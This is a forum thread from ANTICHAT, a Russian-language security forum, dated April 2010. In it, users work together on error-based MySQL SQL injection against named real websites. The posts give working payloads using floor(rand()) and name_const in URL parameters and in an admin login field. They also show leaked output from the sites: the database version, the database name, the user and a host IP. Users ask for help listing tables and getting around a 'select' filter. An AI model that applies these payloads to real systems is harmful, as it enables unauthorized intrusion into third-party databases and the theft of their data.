ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
24.04.2010, 06:29
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
народ прошу помоши в раскрутке через floor rand
вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок.
_http://www.le ve lst oc k.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(version(),0x3a,floor(rand()*2)) x%20from%20(select%201%20union%20select%202)a%20gr oup%20by%20x%20limit%201)--
_http://www.le ve ls to ck.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(database(),0x3a,floor(rand()*2) )x%20from%20(select%201%20union%20select%202)a%20g roup%20by%20x%20limit%201)--
может кто посоветует с правильным запросом для таблиц и колонок. Тут как только добавляю про information_schema.tables сразу ругается
|
|
|
25.04.2010, 12:41
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Сообщение от YuNi|[c
народ прошу помоши в раскрутке через floor rand
вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок.
_http://www.le ve lst oc k.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(version(),0x3a,floor(rand()*2)) x%20from%20(select%201%20union%20select%202)a%20gr oup%20by%20x%20limit%201)--
_http://www.le ve ls to ck.com/mod/emarket/index.php?page=2&sort=1%20and%20row(1,1)%3E(select %20count(*),concat(database(),0x3a,floor(rand()*2) )x%20from%20(select%201%20union%20select%202)a%20g roup%20by%20x%20limit%201)--
может кто посоветует с правильным запросом для таблиц и колонок. Тут как только добавляю про information_schema.tables сразу ругается
esli tebya mysql version() toqda..
http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_con st(version(),1),name_const(version(),1))a)
|
|
|
|
25.04.2010, 21:44
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от LokbatanLi
esli tebya mysql version() toqda..
http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_con st(version(),1),name_const(version(),1))a)
нет версию и дбнайм я сам смогу взят но кто нит подскажите как далше вывести имена таблиц и колонок
|
|
|
|
27.04.2010, 01:28
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от LokbatanLi
esli tebya mysql version() toqda.. http://www.levelstock.com/mod/emarket/index.php?page=2&sort=(select*from(select+name_con st(version(),1),n ame_const(version(),1))a)
Сообщение от YuNi|[c
нет версию и дбнайм я сам смогу взят но кто нит подскажите как далше вывести имена таблиц и колонок
может подскажет наши профи насчет моего вопроса?
|
|
|
|
24.04.2010, 07:19
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Просто фильтрация на from information_schema.tables
Последний раз редактировалось Ctacok; 24.04.2010 в 07:26..
|
|
|
|
24.04.2010, 09:59
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
ну знаю что может быть фильтрация но я основном мучаюс что не могу составит правильный запрос с таким типам скуля. Ну стандартные вроде знаю но тут метод Qwazar как то не очень то гоняю. Попробовал через toolza там тоже не пашет
|
|
|
|
24.04.2010, 13:51
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
http://www.keyin.ca/news.asp?id=52&news=showall
может найдется чувак который обойдет фильтр на select
|
|
|
|
24.04.2010, 14:53
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
http://www.keyin.ca/admin/default.asp
в поле логин admin' or (1,2)=(select * from (select name_const(version(),1),name_const(version(),1))x)--
Duplicate column name '5.0.67.d7-ourdelta-log'
|
|
|
|
24.04.2010, 15:01
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
это хорошо..=) но надо select обойти... меня не интересует админский доступ
очень интересует именно обход фильтра на select
|
|
|
|
24.04.2010, 15:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от pinch
это хорошо..=) но надо select обойти... меня не интересует админский доступ
очень интересует именно обход фильтра на select
Крутите так, какая разница нах...
Какой обход.
' and (select 1 from (select count(0),concat(database(),':',user(),floor(rand(0 )*2)) from (select 1 union select 2 union select 3)x group by 2)a)#
Duplicate entry 'keyincollege:keyincollege@72.167.232.1721' for key 1
ps file_priv у юзера нет!
Последний раз редактировалось Strilo4ka; 24.04.2010 в 15:26..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Комбинированный вид